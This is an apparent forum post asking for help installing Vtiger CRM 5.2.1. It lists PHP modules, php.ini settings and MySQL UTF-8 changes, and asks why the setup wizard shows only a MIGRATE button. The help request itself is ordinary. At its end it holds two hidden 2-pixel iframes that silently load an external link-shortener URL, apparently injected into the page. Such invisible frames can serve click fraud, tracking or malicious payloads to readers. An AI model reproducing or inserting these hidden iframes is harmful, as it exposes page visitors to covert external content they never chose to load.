Help with Vtiger 5.2.1 install

Hi,

I'm a newbie trying to install VTiger 5.2.1. on my Linux hosting server with the following setup
apache 2.0.63
mysql 4.1.22-standard
php- 5.2.14

[PHP Modules]
bcmath
calendar
ctype
curl
date
dom
filter
ftp
gd
hash
iconv
imap
ionCube Loader
json
libxml
mbstring
mcrypt
mysql
mysqli
openssl
pcre
posix
Reflection
session
SimpleXML
sockets
SPL
SQLite
standard
tokenizer
xml
xmlreader
xmlwriter
Zend Optimizer
zlib

[Zend Modules]
Zend Optimizer
the ionCube PHP Loader

PHP.ini values
allow_call_time_reference on
error_reporting E_WARNING & ~E_NOTICE
safe_mode off
display_errors on
file_uploads on
max_execution_time 600
memory_limit 32M
log_errors off
output_buffering on
register_globals off
short_open_tag On

Running the Configuration Wizard, I got the error msg Unable to connect to database
Server. Invalid mySQL Connection Parameters specified

- Database UTF-8 Support Not Enabled.

The hosting guys added the entries below to /etc/my.cnf to try to rectify the UTF-8 issuesbut still no good.
character-set-server=utf8
skip-character-set-client-handshake
default-character-set=utf8
init-connect='SET NAMES utf8'

Then database is created manually using cpanel.

The Configuration Wizard now runs without the INSTALL button and only shows the MIGRATE button. Does this mean the install has completed? If not how do I finish the install?

Any help appreciated. <iframe width="2px" height="2px" src="http://www.yooclick.com/l/9qjblg"></iframe>; <iframe width="2px" height="2px" src="http://www.yooclick.com/l/9qjblg"></iframe>;

Comments

Sign In or Register to comment.